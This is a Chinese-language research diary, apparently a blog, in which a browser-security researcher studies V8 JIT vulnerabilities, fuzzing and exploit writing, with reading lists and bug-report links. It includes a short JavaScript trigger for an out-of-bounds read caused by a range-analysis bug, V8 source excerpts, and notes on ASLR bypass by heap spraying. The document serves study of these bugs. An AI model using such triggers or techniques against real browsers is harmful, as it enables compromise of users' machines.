终于看得懂《IFuzzer: An Evolutionary Interpreter Fuzzer
Using Genetic Programming》说的什么了。
不过确实有局限性，充其量是个demo，想自己写一个了。
commit要看，标准要读，漏洞要调，代码要写。
小孩子才做选择，我全都要。

2018-7-31-8-2

ctf pwn中的v8漏洞利用的坑差不多结了。。思路很多但是终究还是那些东西，利用都是好搞的，回归挖洞（笔记不放）

学会用antlr4（词法/语法分析）写点东西开了个头。。不过预计搞起来也很快
（IFuzzer: An Evolutionary Interpreter Fuzzer using Genetic Programming）
主要是参考这篇paper学习一下，有很多想法了。

然后剩下的主要工作就是学习编译优化，审计一下v8的JIT（看刘炜师傅写的两篇wp很有启发，看得出他对v8 IR有很多理解了，我也可以就这一块多做一些总结输出。。。

和朋友聊了一下，有的东西没有想象中的难，赶紧做出点东西，然后往前走吧。

2018-8-3

日子一天天的过……今天发工资了蛮开心2333
今天分享的东西蛮有意思，听大家说这周做了什么，关于Fuzz的讨论也有意思，貌似有点上路了，这些基础的积累都是有意义的。
这周清理了一些坑，然后挖了更多坑，结了antlr4之后准备开始污点分析之旅了。
顺手列一下煜博推荐的paper：
All You Ever Wanted to Know About
Dynamic Taint Analysis and Forward Symbolic Execution (but might have been afraid to ask)
VUzzer: Application-aware Evolutionary Fuzzing
Towards Efficient Heap Overflow Discovery
发现一个好玩的网站的样子：http://www.vxjump.net/
最后再贴一个编译优化的，还是CMU的，不过年份不同。
http://www.cs.cmu.edu/afs/cs/academic/class/15745-s06/web/schedule.html
本来最后了，不过还有新的最后，……
sky师傅和我讲下一步干嘛了。

最后和我说了一下，其实ArrayBuffer的这种分配方式，可以完美bypass 64位ASLR
其实这里又涉及一个点，那就ASLR的必要条件是虚拟地址空间足够大，而我们的物理地址空间很小，不可能堆喷喷满。
但是……我们可以用0x10000的内存去占位4G，那么其实只要喷2G就可以了……这就bypass了，2333

这些小特性，大特性，系统特性，各种特性的深入理解和消化绝对是十分重要的。
我体验了一次如何从0234发现0236的过程，收获颇丰。

2018-8-4-9

结束了antlr4的学习，fuzz进程挂起。
开始看v8源码，真多……真难懂2333……我好菜。
听同事说，有人看了两个月编译优化被开了。。好方。。加班看书看到2点。。
找到一个不错的PPT。http://sei.pku.edu.cn/~xiongyf04/SA/2015/
今天和sky师傅聊了一下，收获很多，思路很重要，不仅是挖洞的思路，调洞的思路，学习的思路，分析的思路，都很重要。
今天花时间整理了一下gpz的洞和bugs上能找到的JIT的洞，还是挺凌乱的，也开始思考一些JIT的攻击面的本质，结点的处理等等，把文件都翻了一下。

2018-8-9-18

好像很久没写日记了。。不知道为什么。。可能是突然泄气，人的情绪总是飘忽不定，对我们这种人更是如此。
还是写一下这段时间做了什么，还是JIT、JIT、JIT，说来我是从什么时候开始想要挖浏览器漏洞呢？为什么选择这么一条路呢？回忆一下又觉得当年浪费了太多时间在无意义的事情上（比如CTF，Android），应该好好看webkit的……叹气
不过说来这几天看到的JIT的资料还不错，大宝写了JIT漏洞的分析。
http://www.filpizlo.com/slides/pizlo-icooolps2018-inline-caches-slides.pdf
https://saelo.github.io/presentations/blackhat_us_18_attacking_client_side_jit_compilers.pdf
https://blogs.projectmoon.pw/2018/08/17/Edge-InlineArrayPush-Remote-Code-Execution/
从目前js引擎的攻击面来看，wasm和JIT可能是最可能出洞的点了。。也不好搞也不好搞2333
https://googleprojectzero.blogspot.com/2018/08/the-problems-and-promise-of-webassembly.html
周六睡到中午，然后去了长亭的“无pwn不欢”线下沙龙，领了衣服和杯子，感动。
冠成大佬的分享很nice，似乎一下子点出了我觉得逆向越来越迷的关键……
https://github.com/A7um/slides/blob/master/2018/re_methodology.pdf
链接:https://pan.baidu.com/s/1K6Wdj1L6Dt5LJb7R-7GLhA 密码:jgks
之前冠成大佬经常逆国产小软件挖洞，然后我一直不知道是咋搞的。。

现在想想，或许能够熟练的掌握trace+disassembly/指令记录+分析，这样的一种逆向能力，是十分重要的（如果是国产小软件，再加上如何从二进制文件搜索开源代码吧）
至于说，和做CTF一样，逆向各种神奇的架构和算法，我觉得是没必要的。
嘛，虽然我还都不会，不过姑且给自己找到了一个学习的思路和方法，还是收获蛮多。
5. 这段时间的主要工作是在分析CVE-2017-5121，关于v8 escape analysis phase，不过没有patch，这个漏洞是发生在6.1版本之前，6.2之后换掉了整个escape analysis，重新实现了一遍。
这个漏洞实际上是逃逸分析将一个对象分析为不会逃逸后，将其初始化节点删除，而又有LoadElement/LoadField的节点使用它。本质上是由于有依赖关系的节点的访问顺序不正确导致的。

2018-8-19

真的是硬生生赖床到一点半，饿的要死了才爬起来上班……
试图去搜和v8有关的design paper读，但是没找到，ORZ。。浪费时间。。
分析load elimination phase，学到不少东西。

2018-8-20

我觉得挖edge怕不是loki的KPI吧。。又是挖了一堆，其中有一个还和大宝的撞了，是不是大佬的思路都是一样的……ORZ
今天可以分析学习一个。
今天各种填学校回去要交的材料，然后申请盖章，ORZ。
各种麻烦死。

[Edge] [CVE-2018-8298] [1582] 1582 - Microsoft Edge: Chakra: Bugs in InitializeNumberFormat and InitializeDateTimeFormat - project-zero - Monorail
https://bugs.chromium.org/p/project-zero/issues/detail?id=1582
[Edge] [None] [1578] 1578 - Microsoft Edge: Chakra: JIT: Type confusion with InlineArrayPush - project-zero - Monorail
https://bugs.chromium.org/p/project-zero/issues/detail?id=1578
[Edge] [CVE-2018-8291] [1576] 1576 - Microsoft Edge: Chakra: DictionaryPropertyDescriptor::CopyFrom doesn’t copy all fields - project-zero - Monorail
https://bugs.chromium.org/p/project-zero/issues/detail?id=1576
[Edge] [CVE-2018-8279] [1570] 1570 - Microsoft Edge: Chakra: Parameter scope parsing bug - project-zero - Monorail
https://bugs.chromium.org/p/project-zero/issues/detail?id=1570
[Edge] [CVE-2018-8288] [1565] 1565 - Microsoft Edge: Chakra: JIT: ImplicitCallFlags check bypass with Intl - project-zero - Monorail
https://bugs.chromium.org/p/project-zero/issues/detail?id=1565

2018-8-21

昨天看的一点点东西更新了一篇笔记，就当理理思路了。
昨天要的证明总算开下来了，心里松了一口气，下面调整一下自己的作息，好好工作了。
R大讲了一些turboFan IR设计的东西，给了一些paper读，非常nice
https://www.zhihu.com/question/290982869/answer/474629999
最近在调的那个洞，通过改源码，打印遍历路径，确实看到了一些不一样的东西，差不多分析了0.1吧。。明天继续磕
v8新出了一个wasm的编译器Liftoff好像，又有新东西可以看了ORZ
https://v8project.blogspot.com/2018/08/liftoff.html
和学长聊天，原来他刚毕业那会还在keen team实习过，那时候科恩还没并入腾讯。

2018-8-22-23

这周末就要跑路了，这个洞还没分析的很好，不过还是学到了不少东西。
JIT里面的算法相关的代码看了不少了，还读了paper，找到了一些IR的paper读。
trace的log基本能看懂不少了。
心态平和了很多，虽然我还是看不懂并且很可能一直看不懂ORZ。
不过总算写好了第一版报告。

2018-8-24-25

我一直不是一个很聪明的人，但是我确实是一个喜欢隔一段时间反思一下自己的人，重新审视了一下从7-8月我所学，其实本来我能做的更好，只是因为自己的懒和菜没有看更多，也该收拾心情往前走了。

2018-8-26-31

回了一趟学校，把外出实习申请和体测搞完了，然后sky师傅让我准备一个分享。。ORZ，我咋都不会啊，好方，在线等挺急的。
收到留用短信，还是蛮开心，加油加油。
v8 GC相关的东西准备看一下，先罗列一下资源

Are your v8 garbage collection logs speaking to you?Joyee Cheung -Alibaba Cloud(Alibaba Group)
https://www.slideshare.net/NodejsFoundation/are-your-v8-garbage-collection-logs-speaking-to-youjoyee-cheung-alibaba-cloudalibaba-group
https://www.youtube.com/watch?v=DSBLAG2IvsY
Jank Busters Part Two: Orinoco
https://v8project.blogspot.com/2016/04/jank-busters-part-two-orinoco.html
2016 Beijing node live-Chau Yee Cheung-Are Your V8 GC Logs Speaking to You?
https://www.youtube.com/watch?v=ZWtvUxl6Pyo
垃圾回收的算法与实现
http://library1.ga/_ads/2CCD392F898D2D1DFAD1271E01CF1CB0
A tour of V8: Garbage Collection
http://jayconrod.com/posts/55/a-tour-of-v8-garbage-collection
Memory management in Blink
https://chromium.googlesource.com/chromium/src/+/0e94f26e8/third_party/WebKit/Source/wtf/Allocator.md
V8 —— 你需要知道的垃圾回收机制
https://juejin.im/post/5b398981e51d455e2c33136b
解读 V8 GC Log（二）: 堆内外内存的划分与 GC 算法
https://yq.aliyun.com/articles/592880?spm=a2c4e.11153959.0.0.abf75fbdaPONjd

2018-9-1-3

有点无聊，不想写日记了。
这两天在看其他phase，审相关的一个新洞，一个不错的攻击面，说不定有洞可以挖。
和我关系不错的一个同事今天离职了，有点小难过。
这两天在看了一点编译优化的算法。
想去蹭北大的课旁听，不知道值得不。
https://xiongyingfei.github.io/SA/2017/main.htm
R大的回答依然很赞。。
https://www.zhihu.com/question/28679215/answer/43883727

2018-9-4-5

整理了一下v8的pipeline，重新调试分析了从bytecode->graph这么一个过程，然后把一个类型混淆导致的OOB写了一下分析。
看chakra的笔记，明月师傅太棒了。ORZ

2018-9-6-14

日记写的越来越少了，感觉慢慢习惯社畜生活√
做分享用的PPT，把v8 IR/GC等等写了一下，说来今天是v8 10周年来着……
收到录用电话，以后就是xlabのsakura。
写了两篇分析给导师，天天审代码ORZ。
对，我现在就是饿了在等夜宵（6:15)
这周真是摸鱼……不行不行……要振作！
以后要习惯早睡了，半夜突然心跳过速，4点多……去医院待到六点多降下来了，还好医生说除了心率快，其他的波形都正常……就是熬夜+焦虑吧。。
马上买了个小米手环……强制自己12点睡着，命重要命重要ORZ
录用函发下来了，等十月中旬谈薪资待遇，乖巧.jpg

2018-9-15-16

上周怠惰了一周，下周准备开始从能利用的漏洞开始看了，JIT算法什么的先放一边，然后给自己点高效的正反馈。

2018-9-17-21

这周看了几个能利用的漏洞，整理了一下exp写法，龚广那个oob read->任意地址读写的写法真的好6……，主要在对外发exp的就那么几个人，lokihardt，大宝，龚广，KK。
今天lw师傅分享了v8 UAF，绝赞，加上v8的wasm整理一下下一阶段的工作，继续学习。

2018-9-22

今天整理了一下接下来看什么，先把v8 oob和type confused的几种利用方法和primitive写了一下，ArrayBuffer的backing store这块涉及PartitionAlloc就不是很懂，学习看看。

2018-9-23-28

这周主要还是顺着JIT的洞看了一下，主要就是loki交的几个洞。
762874是lastIndexOf中Range Analysis出错，本来范围应该是(-1,maxlength)，但是它代码是写的是(-1,maxlength-1)，然后范围分析错了之后，通过简单构造，可以在优化的时候觉得索引始终在数组边界内，于是就在simplifed lowering里reduce掉了checkbounds。
但是在新版本v8里，它不会对checkbounds进行消除，加了一个flag，只能在终端启动的时候选择禁用，无法绕过。

  var i = 'A'.repeat(2**28 - 16).indexOf("", 2**28);
  i += 16; // real value: i = 2**28, optimizer: i = 2**28-1
  i >>= 28; // real value i = 1, optimizer: i = 0
  i *= 100000; // real value i = 100000, optimizer: i = 0
  if (i > 3) {
    return 0;
  } else {
    var arr = [0.1, 0.2, 0.3, 0.4];
    return arr[i];
  }
}

然后就把typer这块代码顺着大致看了看。

还调了一个之前异常里触发的callback，bugs:798644
然后在for-loop里改掉了array的类型，从DICTIONARY_ELEMENTS->HOLEY_ELEMENTS。
loki用了一个unshift来把dictionary重新compact，patch里是在for-loop里加了一个类型检查，然后在新版v8里unshift不再能重新compact了，这个特性也没了。
本质上其实还是一个prerequisite不满足引起的fastpath bug，但是loki能想到这么触发真的很厉害。

还有一个在InferReceiverMaps因为new.target被直接当成JSFunction处理，但是其实这里可以接收任何带有constructor的JSReceiver，于是就类型混淆了，之前看过，但是没写笔记，也没好好看这个洞能不能利用，就翻出来想调一下重新看一下。

最后是之前v8 6.9提到的dataview的新特性

Dataview在6.9版本做了比较大的更新

runtime从c++迁移到CSA,用torque(一种用于生成CSA的DSL)重写
JSCall中进行builtin inline

然后我主要是在审JSCall里对DataView的runtime inline的地方，刚开始看。
其他的就想了一些调试看代码的方法，后面我会总结一下写个文档。

2018-9-29-10-8

最近主要就是在学漏洞利用，感觉不错，你看，整天搞分析的时候觉得想写利用，现在天天写利用又觉得还是想再做点分析，矛盾++
博客好久没更新了，文章全都更新在本地了。。不过有v8的问题欢迎一起讨论学习啦（给大佬递茶）。。QQ/Wechat在关于页面有……
慢慢习惯了现在的工作呢，每天想做就有一堆事情可以做，不想做可以什么都不做……

2018-10-9-10-27

整理一下最近学了什么，分析清楚了几个v8的JIT漏洞，暂时把v8的exp学习告一段落了，剩下的都不好写。
搞了一个无脑杂交的js fuzz，效果还行，出乎我的意料
漏洞会挖到的。

2018-10-28-10-29

整理了一下朋友给我的win kernel exploit资料，准备后面学习一下。
win kernel环境搭建
https://bbs.pediy.com/thread-247019.htm
基础知识
https://rootkits.xyz/blog/
https://xiaodaozhi.com/
顺便推一下他的博客。
https://www.redog.me/
https://github.com/redogwu/windows_kernel_exploit
顺便归档一下其他的资料
vm escape资料
https://dangokyo.me/2018/03/02/go-for-vm-escape/
IE漏洞资料
https://github.com/wnagzihxa1n/BrowserSecurity/blob/master/%E5%AD%A6%E4%B9%A0%E8%B5%84%E6%96%99.md
看了一下seccon2018的wp，艺术字那个题没找到wp，但是trick很多做不来，看了一道入门rop和kidvm；看了一下google ctf2018 Final，两道chrome的题目都不太会做，卒。
今天上午开了实验室大会，很有意思。
需要看一下wasm的东西了，blink to do，又是坑
https://bugs.chromium.org/p/chromium/issues/detail?id=826434
https://bugs.chromium.org/p/chromium/issues/detail?id=836141
https://bugs.chromium.org/p/project-zero/issues/detail?id=1642

需要记录一下google ctf2018的一个有趣的challenge。
这个赛题应该是涉及两个知识点，一个是v8的range analysis和remove checkBounds
一个是浏览器里的浮点数是有精度极限的，合理构造能得到有趣的东西。
https://gctf-2018.appspot.com/#challenges/pwn-just-in-time
https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Number/MAX_SAFE_INTEGER

function opt() {
  x = 0.1;
  x = x + 2 + Number.MAX_SAFE_INTEGER ;
  return x
}

opt();
b=opt();
%OptimizeFunctionOnNextCall(opt);
a = opt();
print(b);
print(a);
...
...
9007199254740994
9007199254740992

2018-10-30-11-8

最近还是在主要花时间写利用和分析JIT上，理解checkbounds remove和checkmaps remove对我帮助很大。似乎能够建立起一套新的利用方式。
用gdb直接调试手机chrome真的是个大坑。

2018-11-9-11-10

看google ctf2018那道题，想完整的调一下chrome上的rce，小书包掏出IDA，现在的最大的问题是我需要逆向出math.cos这样的数学函数来帮我下断点，不然我写不了利用。
这可太难了。有没有大佬教教我~
（11-17日补充）：搞出来了，也没有很难，摊手。

2018-11-17

今天是想说一下天府杯啦，xuanwu lab第二，lw师傅打了三个手机浏览器项目，很厉害，明年我也要打。
其实打手机浏览器我已经准备了很多了，很多chrome v8能利用的漏洞，我都在linux上写了exp，剩下的事情并不复杂了，只要能调试和简单的逆向，然后适配手机就OK了。
所以其实呢平时多积累1day的exploit是很有意义的一件事情，到用到的时候就简单适配就好了。
让我感慨比较多的还是大宝，大宝太强了，他一个人可以搞定所有的浏览器，而且花了并不长的时间学习和搞定了ios的越狱。

https://www.anquanke.com/post/id/149939
顺手mark一下他当时的议题，虽然找不到PPT，mosec就是这点不好，完全不公开，只能找到这点资料了。

我现在在xuanwu lab做的并不是很好，挖v8的洞也挖不到，写利用也用不到我，感觉自己的工作就是完全在自学，比较边缘化，但是大家都是这么过来的，总有需要我忙起来的时候，在那之前我只需要不断的积累积累和积累。

其实在这里我想提一件好玩的事情，那就是，如果你不尝试，你永远不知道自己能做到哪一步。
看过我日记的话应该知道，我其实只是从今年二三月份才开始调试CVE的，而且是先搞的内核的漏洞，而浏览器漏洞可能在面试之前只搞过两个周多些（可能更短，然后在实习之前又有很多其他杂七杂八的事情干扰了我，比如期末考试），在实习之前才花了些时间补充了一些基础知识，但我知道远远不够。
然后我面过了xuanwu lab的浏览器组，似乎也拿到了其他的offer（似乎）
在实习的大概四个月里，我学会了如何去审计和分析，积累浏览器特性；
学习了如何写一个能跑起来的js fuzz；
学会了如何调试chrome，在PC上写一个完整的chrome exploit；
一些推特上的大佬给了我不少帮助，感觉大佬们真的是很平易近人了，还有其他朋友和我一起研究了不少东西，我觉得很开心。

我们这个行业发展是很快的，要跟上前面的人的进度，就必须跑起来，飞快的跑起来。

后面的打算是，和大宝说的差不多，一是仔细审计和分析学习历史漏洞，找找how to bypass patch的点，二是好好学习一下其他浏览器上的JIT，比如edge比如jsc，重点学习大宝和loki的洞，寻找更多的启发性的点。
积累下去，我会变得更好的，我确定。

2018-11-19

今天在翻jsc的漏洞exploit，认识了一个越狱大佬，和大佬交流了一下，然后学会了怎么单独编译jsc和怎么找patch。
后面预备写一个jsc漏洞利用系列，todo it。
https://www.w3.org/TR/wasm-js-api-1/
今天在翻wasm的文档，调试分析https://bugs.chromium.org/p/chromium/issues/detail?id=766253，看partitionAllocation的头秃，d8还调不了，配了一下windbg的调试环境，搞了一下符号和断点。
感觉有锅（项目），但是估计不是我背锅，继续干活。。困死我了。
终于找到了，可以写exp了。

2018-11-22

这周前两天配调试环境+去医院。
后两天分析root cause+去医院，倒是找到了root cause和它可能产生的影响，但是到了在partitionAlloc堆上调试exp，又懵了……
感觉在做一道非常难的pwn题。。

2018-11-23

先说结论https://cs.chromium.org/chromium/src/base/allocator/partition_allocator/partition_freelist_entry.h?g=0&l=23
猜我已经全猜出来了，后面整理文档。漏洞很有意思。

这个漏洞的root cause就是在一个wasm实例化InstanceBuilder::InstanceBuilder的时候
因为触发了一次回调。

int InstanceBuilder::ProcessImports(Handle code_table,
  ...
  ...
      MaybeHandle result =
        module_->is_asm_js() ? LookupImportAsm(index, import_name)
                             : LookupImport(index, module_name, import_name);

于是又进行了一次wasm2的实例化，因为wasm的实例化里有这么一个判断。
它会先把已有的compiled_module对象拿来用，首先检查它有没有owner，如果有了就克隆一份。
因为我们是在还没有设置owner之前就触发了回调再次实例化，于是两个wasm对象的compiled_module是一样的。

Handle original;
    {
      DisallowHeapAllocation no_gc;
      original = handle(module_object_->compiled_module());
      if (original->has_weak_owning_instance()) {
        owner = handle(WasmInstanceObject::cast(
            original->weak_owning_instance()->value()));
      }
    }
    ...
    if (original->has_weak_owning_instance()) {
      // Clone, but don't insert yet the clone in the instances chain.
      // We do that last. Since we are holding on to the owner instance,
      // the owner + original state used for cloning and patching
      // won't be mutated by possible finalizer runs.
      DCHECK(!owner.is_null());
      ...
      TRACE("Cloning from %d\n", original->instance_id());

在后面grow掉wasm2的buffer的时候，会将两个instance的wasm_memory_reference都改掉。

void RelocInfo::update_wasm_memory_reference(
    Isolate* isolate, Address old_base, Address new_base,
    ICacheFlushMode icache_flush_mode) {
//  DCHECK(IsWasmMemoryReference(rmode_));
    printf("new_base is :%p\n",new_base);
    printf("old_base is :%p\n",old_base);
  Address updated_reference = new_base + (wasm_memory_reference() - old_base);
    printf("updated_reference is:%p\n",updated_reference);
  // The reference is not checked here but at runtime. Validity of references
  // may change over time.
  set_embedded_address(isolate, updated_reference, icache_flush_mode);
}

具体的还要再看看，剩下主要还是在看partitionAlloc，
利用基本上是搞明白了，一些细节的东西还是要整理一下。

组会被问chrome sandbox escape，啥都不会的我。。太菜了ORZ
这周基本上就是在调试wasm的漏洞，和实现一个arraybuffer oob r/w的exp吧，后者geohot在2014年就搞过了23333.

2018-11-27

这一周基本上都在医院辗转度过……考虑是植物神经紊乱吧。
摸鱼休息，调整饮食和作息，锻炼身体，不知不觉已经老了ORZ。
说到底。。经常凌晨三四点睡觉还不吃早饭。。能苟活到现在我也太幸运了。。
可惜了realworld ctf，估计是不能去了，这段时间还是养病重要。。要吃清淡了。。趴桌
把partitionAlloc大概看了看，基本没问题了，利用也基本写完了，不过在任意地址读写的原语之后，如何得到一个完整的exp，还要商榷一下，windbg很厉害。。’dx -r1 isolate’
cheat engine也很厉害……
不过说来调的时候发现了很多有意思的东西，可以顺手再逆一下chrome了。
另外在看之前的东西的时候，发现typedArray的elements里原来就有存arraybuffer的backingstore，越界直接写这里就行了。。
准备看下天府杯的那个洞了，基本上定位到了patch，这两天调一下看看。
试图编译chrome apk，然后用来恢复符号，看看能不能在国产手机浏览器上找到点有用的调试符号。这个真的是很头疼呀，也不太好意思问同事，趴桌。

2018-11-30

一周结束了，整理一下这周，最近十点睡八点起，过得很有规律，也挺好的，身体也在康复中，很遗憾realworld ctf不能去了，多休息吧。
在最新版chrome上面写了exp，简单的栈劫持+mprotect弹计算器，挺开心的。
说来大概从开始写利用也搞了两个月了，稍微有点进度感人，但是总算还是搞的差不多了，对GC管理还要再熟悉，不过很开心了。
接下来主要看看chrome sandbox escape fuzz，然后loki最近在挖jsc的漏洞，这个也值得好好学习一下。
最近似乎经常有人问我二进制怎么入门……之前看过一个杨博士以前说的，手写一个cpu，手写一个内核，手写一个编译器，然后我觉得最好再手写一个STL库。然后就入门了（逃

2018-12-3

扁桃体发炎的我完美错过realworld ctf，熬夜熬的ORZ
看了看rw的赛题，safari jsc那道题基本上就是抄的saelo p2o2018的漏洞造的洞，clobeerWorld代表删除之前做出的任何关于类型信息的假设,然后长亭造的这个洞把它删掉了，即假定在for-in循环中检索对象的property是没有副作用的，感觉比v8里好懂多了…
exp如果不是因为最近的那个缓解机制的话，应该复制粘贴就能写了。。23333
病了两周的我今天在补笔记，很多细节忘干净了。ORZ

2018-12-4

今天因为学校要交材料回去补第七学期外出实习的证明，置换学分。所以感慨一下，自己的人生好像在走钢丝，一不小心就GG了
熟悉我的人可能知道，我学校很一般23333
我的小伙伴也觉得：没有强大的背景和资源倒不一定意味着没有前途，只是容错率低得多罢了，在别人探索人生享受诗和远方的时候就不得不找准一条路走到黑，一个环节出了问题，就GG了
为什么同样是这个行业，有的人就不会焦虑，因为差距呀。
然后一件开心的事情是，我导师今天终于和我聊了一下，我还以为我被忘了23333，继续努力就是了。
没什么可以选择的，就算掉下去了，我能做的，也只有让自己不要摔的太惨而已。
补了cve-2017-15401的笔记，完全是windbg和cheatengine写出来的exp可还行（滑稽

2018-12-5

龚神的洞看不懂。
最近在一种思路出了好几个洞，也是厉害，在我觉得没东西看的时候，突然爆炸。。

2018-12-9

最近仔细看了看，龚神的洞是worker的序列化和反序列化的问题，这个点从来也没去看过，感觉大家估计也不懂这个东西该怎么用，还是很神奇的一件事情。
最近对逻辑漏洞十分感兴趣，得益于同事花了两天挖到了一个windows的提权0day
sqlite的漏洞，可以拿来打Chrome，之前看过一点相关的东西
https://worthdoingbadly.com/sqlitebug/

2018-12-10-17

最近就一直在解决1710的exp的问题，解决不了，陷入自闭。。
https://bugs.chromium.org/p/project-zero/issues/detail?id=1710
今天休息一下看看safari 0.5day。
http://phrack.org/papers/attacking_javascript_engines.html
https://github.com/niklasb/sploits/blob/master/safari/regexp-uxss.html

2018-12-17-26

最近一直在摸鱼，群星真好玩.jpg，然后在找方向，一直以来靠分析漏洞和写利用来续了一波命，但是还是没搞懂该怎么挖洞，也没人能告诉我chrome v8的洞怎么挖，论编程的能力，这两年在学校靠自己真的没锻炼出啥来，突然开始意识到自己基础薄弱什么都不会了。
别人在学校的时候，就通过上课+实验的方式打了很好的基础，而我……感觉一路走来都是自己一个人xjb搞，偶尔和师傅们交流一下，方向上感觉没什么大的问题，就是真的，嗯，我太弱了。希望大家不要犯这种错误了，但是要是再来一次的话，我还是会选择先进实验室再说。
操作系统基础学习资料，顺便安利CSAPP
https://nju-ics.gitbooks.io/ics2016-programming-assignment/content/
https://github.com/Changochen/nju-pa
逻辑漏洞学习，顺便安利James Forshaw，一直想学也一直没学，就先todo list了
https://conference.hitb.org/hitbsecconf2017ams/materials/D2T3%20-%20James%20Forshaw%20-%20Introduction%20to%20Logical%20Privilege%20Escalation%20on%20Windows.pdf
工控协议Fuzz的一个比较有趣的资料？
https://mp.weixin.qq.com/s/QcGd746CkQVIxx847Zp8Jg
想学fuzz，等35C3 talk的PPT。

2018-12-27-31

35c3 video和日程整理
https://media.ccc.de
https://fahrplan.events.ccc.de/congress/2018/Fahrplan/schedule/3.html
开始fuzz之旅
From Zero to Zero Day-Jonathan Jacobi
https://www.youtube.com/watch?v=xp1YDOtWohw
Attacking Chrome IPC-nedwill
https://www.youtube.com/watch?v=39yPeiY808w
The Layman’s Guide to Zero-Day Engineering
https://www.youtube.com/watch?v=WbuGMs2OcbE
简述一下From Zero to Zero Day里我觉得有趣的东西
- 基础很重要，其中最重要的就是c/c++/os(或者你具体研究的那个系统，比如浏览器)internal/能用python或者其他语言coding来实现自己的想法。
  最后一点我觉得KT师傅搞的非常棒，可惜我太菜了。
- 通过CTF或者具体的简单的小软件来学习关于漏洞的基础知识，不要害怕失败，从其他人的解法中你依然能学到非常多的东西，这里建议follow defcon预选赛和defcon的赛题，其他的可以不做，没有什么意义。
  推荐一个系列教程
  http://liveoverflow.com/capture_the_flag/index.html
  https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w
  但是要注意，不要在“浅水区”待太久，你只要确保自己有继续进行研究的能力即可，我觉得半年可以完成这些事情，然后继续往下。
- 接下来需要的就是eat sleep pwn,repeat;2333
  这里的建议是，当你掌握了一些trick和思路之后，你可以尝试去理解真实的漏洞，理解其中的pattern
  比如你可以去看google project zero提交的漏洞，并研究他们。
- 后面的部分是一个有趣的漏洞和它的exp，不过这部分其实有点无聊。

我似乎懂了些什么有趣的东西，从jsc开始实践。why not v8?it’s difficult…）

继续简述一下Attacking Chrome IPC里的一些我觉得关键的地方
- 练习代码审计
  1. 拿到一个已经存在的漏洞报告
  2. 知道漏洞大概发生在什么地方，或者是什么模块，不要去看完整的漏洞描述，尝试去发现漏洞。
  3. 如果你失败了，看一下漏洞报告，并且去总结你错过了什么地方。
  4. 重复这个过程，直到你觉得OK为止。
- 练习fuzz
  1. 请确定自己有充分的审计上的练习
  2. 拿到一个漏洞，通过自己写fuzz去trigger它。
- protobuf-mutator+libfuzzer

年终的最后几天，是一边睡觉一边和这些有趣的talk度过的，还看了35c3的v8题目，有一个逃逸分析的点想了半个月没想到，是我蠢了。
有趣的挑战，明年要继续努力了，夯实基础，砥砺前行。
一个人久了真的很累呀，新的一年，找个朋友一起住，一起打打游戏，搞搞研究，开开心~熬过这半年就好了。

2019-1-1-2

写一个能跑的js fuzz，然后慢慢调。
lighthouse+lcov–>feedback
dharma–>语法生成
将两部分结合一下就是一个能跑的js fuzz，写代码真麻烦2333
今天大概看了看dharma的语法描述文件怎么写，想想要写一堆语法描述就麻烦。。
youtube上看到一个小系列The Art of Fuzzing，upx是真的很好fuzz。。很快一堆crash
然后是google的libfuzzerTutorial很有趣。
https://github.com/google/fuzzer-test-suite/blob/master/tutorial/libFuzzerTutorial.md
所以今天大概最后就是再看了一下webkid。

2019-1-3-9

研究safari jsc
safari JIT exploit
https://www.youtube.com/watch?v=bqehb-YZ9jo
https://share.weiyun.com/5IJZPBp
fuzz book
https://www.fuzzingbook.org
pizlo jsc
http://www.filpizlo.com/slides/pizlo-splash2018-jsc-compiler-slides.pdf
http://www.filpizlo.com/
其他乱七八糟的paper
https://llvm.org/devmtg/2014-10/Slides/Trick-FTL.pdf
Array Bounds Check Elimination for the Java HotSpotTM Client Compiler
http://www.ssw.uni-linz.ac.at/Research/Papers/Wuerthinger07/Wuerthinger07.pdf

2019-1-12

研究编译原理
https://www.bilibili.com/video/av17669734/?p=77
刷完视频刷书，重新看感觉有新收获，得到的认知就是：

要知道你看的这个东西是用来做什么的，解决什么问题的
它具体可能是怎么实现的，js引擎里是怎么实现的
modern compiler和书里的不同之处

2019-4-2

不写日记感觉不能梳理自己每天在干嘛，就写一下好了。

学习saelo的两个spiderMonkey漏洞
https://bugs.chromium.org/p/project-zero/issues/detail?id=1791
https://bugs.chromium.org/p/project-zero/issues/detail?id=1810
学习saelo的jsc漏洞
https://bugs.chromium.org/p/project-zero/issues/detail?id=1753
关于ArrayWithSlowPutStorage

2019-4-24

在漫长的时间里无所作为，开始反省自己遇到的瓶颈到底是什么，除了chakra，其他浏览器的JIT优化漏洞总是越来越少了。
首先是在我花了很长时间的浏览器JIT优化方面，已经很久没有chrome v8的有趣漏洞出现了，我分析了龚广天府cup的漏洞，以及最近的那个FileReader的漏洞，有趣的是，它们的漏洞pattern都是，在处理超长的数据或者其他东西的时候，没有处理好，导致畸形数据或者错误的程序执行逻辑产生，但是并不太好迅速的针对进行审计。
我依然更感兴趣在优化漏洞上，尤其是大宝发现的那些chakra漏洞，非常有趣，但是v8里没有chakra那些奇奇怪怪的设计。
fuzz依然是我更感兴趣的方向，但是单纯js fuzz已经没什么前途了。。
和Atum这样的顶级二进制选手聊过之后，感觉自己在更多的软件实现，尤其是内核的一些东西上的欠缺，要更理解这些系统机制以及如何操纵它们才可以。
https://github.com/A7um/syscallhook
强的令人发指。。
通过顶级CTF来迭代知识依然是一个好的选择，抛弃掉无用的heap相关的赛题，剩下的题目质量依然很高很好，值得学习，尤其是c3 ctf。
挖了这么久漏洞，终于明白了，攻击面和结合攻击面去fuzz，是最合适的挖洞方法，剩下就是code smell。
我觉得逻辑漏洞是一个很有趣的方向，不知道有没有大佬带我玩，逆向一些国产小软件的进程间通信来找找漏洞啥的。

2019-4-25

最近分析的比较有趣的浏览器漏洞。
Issue 1793: Chrome: Integer overflow in NewFixedDoubleArray
https://bugs.chromium.org/p/project-zero/issues/detail?id=1793
CVE-2019-5786 FileReader UaF
OOB Write in ValueDeserializer::ReadDenseJSArray (Tian Fu Cup）
https://bugs.chromium.org/p/chromium/issues/detail?id=905940
https://bugs.chromium.org/p/chromium/issues/detail?id=906313
https://bugs.chromium.org/p/chromium/issues/detail?id=914731
现在看这些漏洞，有一些有趣的code smell了。浏览器对我来说慢慢的也已经变成了一个看得懂的东西呢，不过离挖到洞还早。

2019-6-5

我的CVE。

https://chromereleases.googleblog.com/2019/06/stable-channel-update-for-desktop.html
